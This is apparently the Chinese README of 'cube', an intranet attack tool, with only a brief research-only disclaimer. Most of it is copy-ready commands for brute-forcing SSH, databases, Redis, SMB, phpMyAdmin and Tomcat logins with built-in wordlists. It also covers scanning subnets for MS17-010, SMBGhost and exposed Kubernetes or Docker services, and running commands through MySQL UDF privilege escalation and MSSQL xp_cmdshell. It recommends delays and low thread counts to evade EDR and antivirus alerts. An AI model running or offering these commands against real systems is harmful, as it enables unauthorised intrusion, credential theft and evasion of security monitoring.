声明

特别声明：此工具仅限于安全研究，禁止使用该项目进行违法操作，否则自行承担相关责任

特点

• 方便二次开发，快速增加插件
• 支持输出结果到excel文档
• 精简运行参数，方便记忆

一把梭

如果没有耐心看下面的命令选项，运行如下命令，然后打开pwn.xlsx，最终结果会以IP纬度聚合展示：

cube crack -x X -s 192.168.2.1/24 -o /tmp/pwn.xlsx
cube probe -x Y -s 192.168.2.1/24 -o /tmp/pwn.xlsx
cube probe -x K8S -s 192.168.2.1/24 -o /tmp/pwn.xlsx	//如果内网存在k8s，会扫描2379，10250，6443端口

全局参数

• -v: 输出内容更详细，一般用于调试
• -n: 设定crack和probe模块的运行线程数量，默认30线程
• --delay: 设定此选项参数为n的时候，crack和probe模块强制设为单线程，在线程运行之间休眠n秒，用于绕过EDR

0x1. crack模块

使用内置词典爆破SSH

cube crack -s 192.168.1.1 -x ssh

指定用户密码爆破SSH

cube crack -l root,ubuntu -p 123,000111,root -x ssh -s 192.168.1.1
cube crack -L user.txt -P pass.txt -s 192.168.1.1/24 -x ssh
cube crack -l root -P pass.txt -s 192.168.1.1/24 -x ssh

指定端口爆破SSH

cube crack -l root -p root -s 192.168.1.1 -x ssh --port 2222

使用内置词典爆破ssh和mysql

# 爆破mysql和ssh(注意ssh和mysql之间的逗号不存在空格)
cube crack -s 192.168.1.1 -x ssh,mysql

爆破phpmyadmin(不可与其它插件组合)

cube crack -s http://192.168.2.1 -x phpmyadmin

爆破tomcat(不可与其它插件组合)

cube crack -x httpbasic -s http://127.0.0.1:7788/manager -v

加载全部爆破插件（httpbasic/jenkins/phpmyadmin/zabbix除外）

cube crack -x X -s 192.168.1.1

• phpmyadmin这类http的爆破插件只能单独使用，不可与其它插件同时加载，类似的插件有: httpbasic/jenkins/phpmyadmin/zabbix
• httpbasic模块是用来爆破使用basic auth认证的服务，比如tomcat登录，nginx的basic auth
• -x X是加载全部可用的爆破插件，先检查端口，端口开放之后爆破
• 未指定用户密码的时候，会加载内置词典
• zabbix插件没有卵用，爆破5次失败之后会锁定30s
• 默认线程是30，这种情况下爆破会触发x绒的告警，建议设定为10～15

支持的爆破插件

• 可组合使用: elastic/ftp/mongo/mssql/mysql/postgres/redis/smb/ssh
• 不可组合使用： httpbasic/jenkins/phpmyadmin/zabbix

0x2. probe模块

加载全部默认插件

# -x Y的时候加载全部probe插件， -x -X只会加载部分默认插件
cube probe -x X -s 192.168.2.1/24
cube probe -x Y -s 192.168.2.1/24

加载指定插件

# 加载oxid,ms17010插件
cube probe -x oxid,ms17010 -s 192.168.2.1/24

# 加载WIN集合插件，WIN集合插件下有 ping,netbios,oxid,smb,winrm,wmi,mssql
cube probe -x WIN -s 192.168.2.1/24

支持的探测插件

FUNC	PORT	LOAD BY X
docker	2375	Y
dubbo	20880	Y
etcd	2379	Y
k8s10250	10250	N
k8s6443	6443	N
ms17010	445	Y
mssql	1433	N
netbios	137	N
oxid	135	Y
ping		N
rmi	1099	Y
smb	445	Y
smbghost	445	Y
winrm	5985	N
wmi	135	N
zookeeper	2181	Y
jboss	3873	Y
prometheus	9090	Y

• smb/wmi/winrm/mssql是利用NTLM认证过程获取Windows版本系统信息
• 使用ping/netbios的时候，最好单独使用获取更准确的结果，线程数量建议为10
• Load By X: 是指cube probe -x X -s 192.168.2.1/24的时候，-x X是否需要加载的插件

0x3. 结果输出

在使用crack和probe模块的任何插件都可以加上-o result.xlsx，用于把结果写入到excel，当excel已经存在 的时候，cube会把当前扫描的结果自动追加到文档，建议扫描结束之后的文档固定首行首列，查看更方便。

0x4. 快速开发

Crack模块

Crack模块可以抽象为一个爆破的框架，当需要爆破的插件不在Cube可用插件列表里面，可以使用go快速开发爆破插件。 crack模块下的命令参数同样适用新增的插件，比如-l/-L，-p/-P，--port。 比如新增一个自定义爆破插件，插件名是cloud，默认端口8080，爆破的默认密码使用内置的config.PASSWORDS，插件需要实现crack模块的以下接口：

	CrackName() string       //插件名称
	CrackPort() string       //插件默认端口
	CrackAuthUser() []string //插件默认爆破的用户名
	CrackAuthPass() []string //插件默认爆破的密码，可以使用config.PASSWORD
	IsMutex() bool           //是否是只能单独使用的插件，比如爆破phpmyadmin类的http插件，当然elastic是个例外
	CrackPortCheck() bool    //是否需要端口检查，TCP协议设置为true，phpmyadmin单独使用的插件和UDP协议类的跳过端口检测，设置为false
	Exec() CrackResult       //爆破插件的具体实现

• 如果需要-x X加载cloud, 修改config/config.go，把cloud加入到CrackX列表里面

Probe模块

同样新增Probe插件和crack类似，也可以看作信息收集的框架，新增的插件需要实现以下接口:

	ProbeName() string      //插件名称
	ProbePort() string      //插件默认端口
	PortCheck() bool        //是否需要端口检查
	ProbeExec() ProbeResult //执行插件

0x5 Sqlcmd模块

用于mysql的UDF提权(暂时支持windows x64)，mssql命令执行：

#开启UDF执行命令
cube sqlcmd -x mysql -l root -p root -e "whoami"

#清除xp_cmdshell
cube sqlcmd -x mysql -l root -p root -e "clear"

#指定mssql端口
cube sqlcmd -x mssql -l sa -p sa -e "whoami" --port 4134

可用插件

参考

• X-Crack
• LadonGo
• fscan
• gobuster
• sqltool
• F-Scrack

TODO

• 数据库利用工具
• MDUT
• 完成SQLCMD模块

  -m ls  <dst path>
  -m cat <dst file>
  -m upload <src path> <dst path>
  -m exec <cmd string>

cube sqlcmd -s 127.0.0.1 -l root -p root -x mssql exec "whoami"
cube sqlcmd -s 127.0.0.1 -l root -p root -x mssql upload  <src> <dst>
cube sqlcmd -s 127.0.0.1 -l root -p root -x mssql ls  <src>
cube sqlcmd -s 127.0.0.1 -l root -p root -x mssql cat  <src> 

• 检查某个方法是否实现了接口
• probe模块下的mssql探测好像存在问题，需要确认

---

Stargazers over time